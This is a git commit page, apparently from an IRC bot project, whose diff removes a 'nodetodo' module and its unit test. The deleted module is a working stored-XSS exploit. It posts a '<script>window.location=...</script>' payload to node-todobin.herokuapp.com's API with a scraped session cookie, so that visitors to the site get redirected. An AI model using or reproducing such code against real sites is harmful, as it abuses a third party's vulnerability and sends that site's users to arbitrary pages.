remove broken nodetodo module
mutantmonkey
parent
402137d379
commit
f8e2afbb9d
|
|
@ -1,69 +0,0 @@
|
||||||
#!/usr/bin/python3
|
|
||||||
"""
|
|
||||||
nodetodo.py - node-todo uploader
|
|
||||||
author: mutantmonkey <mutantmonkey@mutantmonkey.in>
|
|
||||||
author: telnoratti <calvin@winkowski.me>
|
|
||||||
"""
|
|
||||||
|
|
||||||
from urllib.error import HTTPError
|
|
||||||
from urllib import request
|
|
||||||
from tools import GrumbleError
|
|
||||||
import web
|
|
||||||
import json
|
|
||||||
|
|
||||||
def xss(phenny, input):
|
|
||||||
""".xss <url> - Upload a URL to an XSS vulnerability in node-todobin.herokuapp.com."""
|
|
||||||
|
|
||||||
url = input.group(2)
|
|
||||||
if not url:
|
|
||||||
phenny.reply("No URL provided.")
|
|
||||||
return
|
|
||||||
|
|
||||||
if not url.startswith('http'):
|
|
||||||
url = ''.join(['http://', url])
|
|
||||||
|
|
||||||
try:
|
|
||||||
url = urlshortener(url)
|
|
||||||
except (HTTPError, IOError):
|
|
||||||
raise GrumbleError("THE INTERNET IS FUCKING BROKEN. Please try again later.")
|
|
||||||
|
|
||||||
phenny.reply(url)
|
|
||||||
xss.rule = (['xss'], r'(.*)')
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
def urlshortener(longurl):
|
|
||||||
xss = ''.join(["""{"status":false,"text":"<script>window.location='""", longurl, """'</script>"}"""])
|
|
||||||
xss = xss.encode()
|
|
||||||
r = request.urlopen('http://node-todobin.herokuapp.com/list')
|
|
||||||
cookie = r.info().get('Set-Cookie').partition('=')[2].partition(';')[0]
|
|
||||||
|
|
||||||
r = request.Request('http://node-todobin.herokuapp.com/api/todos',
|
|
||||||
headers={
|
|
||||||
'Content-Type': 'application/json',
|
|
||||||
'Accept': 'application/json, text/javascript, */*',
|
|
||||||
'Cookie': cookie,
|
|
||||||
}, data=b'{"id":null}')
|
|
||||||
opener = request.build_opener(request.HTTPHandler)
|
|
||||||
response = opener.open(r)
|
|
||||||
data = response.read()
|
|
||||||
js = json.loads(data.decode('utf-8'))
|
|
||||||
uri = js.get('uri')
|
|
||||||
url = '/'.join(['http://node-todobin.herokuapp.com/api/todos', uri])
|
|
||||||
newurl = '/'.join(['http://node-todobin.herokuapp.com/list', uri])
|
|
||||||
|
|
||||||
request.urlopen(url)
|
|
||||||
request.urlopen(newurl)
|
|
||||||
r = request.Request(url,
|
|
||||||
headers={
|
|
||||||
'Content-Type': 'application/json',
|
|
||||||
'Accept': 'application/json, text/javascript, */*',
|
|
||||||
'Cookie': cookie,
|
|
||||||
}, data=xss)
|
|
||||||
|
|
||||||
opener.open(r)
|
|
||||||
|
|
||||||
return newurl
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
|
||||||
print(__doc__.strip())
|
|
||||||
|
|
@ -1,23 +0,0 @@
|
||||||
"""
|
|
||||||
test_nodetodo.py - tests for the node-todo xss module
|
|
||||||
author: mutantmonkey <mutantmonkey@mutantmonkey.in>
|
|
||||||
"""
|
|
||||||
|
|
||||||
import re
|
|
||||||
import unittest
|
|
||||||
from mock import MagicMock, Mock
|
|
||||||
from modules.nodetodo import xss, urlshortener
|
|
||||||
|
|
||||||
|
|
||||||
class TestNodeTodo(unittest.TestCase):
|
|
||||||
def setUp(self):
|
|
||||||
self.phenny = MagicMock()
|
|
||||||
|
|
||||||
def test_xss(self):
|
|
||||||
input = Mock(group=lambda x: 'http://vtluug.org/')
|
|
||||||
xss(self.phenny, input)
|
|
||||||
|
|
||||||
out = self.phenny.reply.call_args[0][0]
|
|
||||||
m = re.match('^http://node-todobin\.herokuapp\.com/list/[a-z0-9]+$',
|
|
||||||
out, flags=re.UNICODE)
|
|
||||||
self.assertTrue(m)
|
|
||||||
Loading…
Reference in New Issue